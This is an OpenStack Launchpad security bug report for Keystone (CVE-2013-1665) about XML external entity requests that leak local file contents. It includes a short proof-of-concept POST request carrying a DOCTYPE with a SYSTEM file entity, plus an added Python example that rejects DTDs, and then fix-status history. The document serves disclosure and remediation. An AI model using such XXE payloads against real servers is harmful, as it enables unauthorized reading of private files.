[OSSA 2013-004] Local file leak through entities in XML requests (CVE-2013-1665)
Bug #1100279 reported by Thierry Carrez
This bug affects 3 people
Affects | Status | Importance | Assigned to | Milestone |
---|---|---|---|---|
OpenStack Identity (keystone) | Fix Released | High | Dolph Mathews | |
Essex | Fix Released | High | Dolph Mathews | |
Folsom | Fix Released | High | Dolph Mathews | |
OpenStack Security Advisory | Fix Released | Undecided | Thierry Carrez | |
Bug Description
Evil XML! Jonathan Murray from NCC Group reported that you can leak local file contents using XML entities in Keystone requests:
POST /v2.0//
x-auth-token: d0e1a2d3b4e5e6f7
content-type: application/xml
<!DOCTYPE doc [ <!ENTITY eny SYSTEM "file:/
<role>
<name>&ent;</name>
</role>
just returns the content of the local file in role.name.
Looks like we should disable parsing entities altogether, they seem to be exploitable in pretty awesome ways. I'm not sure only Keystone is affected by this.
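One way to apply the "disable parsing entities altogether" idea from the description, shown as an added example that is not part of the bug report and is not Keystone's actual fix. The names `parse_request_xml`, `role_name` and `ForbiddenXML` are hypothetical, and both sample bodies (including the placeholder file URI) are constructed for the example.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class ForbiddenXML(ValueError):
    """Raised when a request body carries a DTD or entity declaration."""


def _reject(what):
    # Build an expat callback that aborts parsing as soon as it fires.
    def handler(*args):
        raise ForbiddenXML(f"{what} not allowed in request body")
    return handler


def parse_request_xml(body: bytes) -> ET.Element:
    """Parse an untrusted XML body, refusing DOCTYPE and entity declarations."""
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = _reject("DOCTYPE")
    scanner.EntityDeclHandler = _reject("entity declaration")
    scanner.ExternalEntityRefHandler = _reject("external entity reference")
    scanner.Parse(body, True)   # raises ForbiddenXML or expat.ExpatError
    return ET.fromstring(body)  # only reached for DTD-free documents


def role_name(body: bytes):
    """Return the text of <role><name>, or None when the body is rejected."""
    try:
        return parse_request_xml(body).findtext("name")
    except (ForbiddenXML, expat.ExpatError):
        return None


# Constructed sample bodies; the file URI is a placeholder, not a real path.
BENIGN = b"<role><name>admin</name></role>"
WITH_ENTITY = (
    b'<!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///constructed/placeholder"> ]>'
    b"<role><name>&ent;</name></role>"
)

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("with entity", WITH_ENTITY)):
        print(label, "->", role_name(body))
```

The pre-scan rejects the document at the DOCTYPE declaration, before any entity is defined or expanded, so the element tree is only built from bodies that contain no DTD at all.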
Changed in keystone:
milestone: none → 2012.2.3

Changed in keystone:
milestone: 2012.2.3 → none

Changed in keystone:
importance: Undecided → High
status: Confirmed → Triaged

summary:
- Local file leak through entities in XML requests
+ Local file leak through entities in XML requests (CVE-2013-1665)
information type: Private Security → Public Security

Changed in keystone:
milestone: none → grizzly-3
status: Fix Committed → Fix Released

Changed in keystone:
milestone: grizzly-3 → 2013.1

summary:
- Local file leak through entities in XML requests (CVE-2013-1665)
+ [OSSA 2013-004] Local file leak through entities in XML requests (CVE-2013-1665)

Changed in ossa:
assignee: nobody → Thierry Carrez (ttx)
status: New → Fix Released
Adding Joe Heck and Dan Prince for confirmation.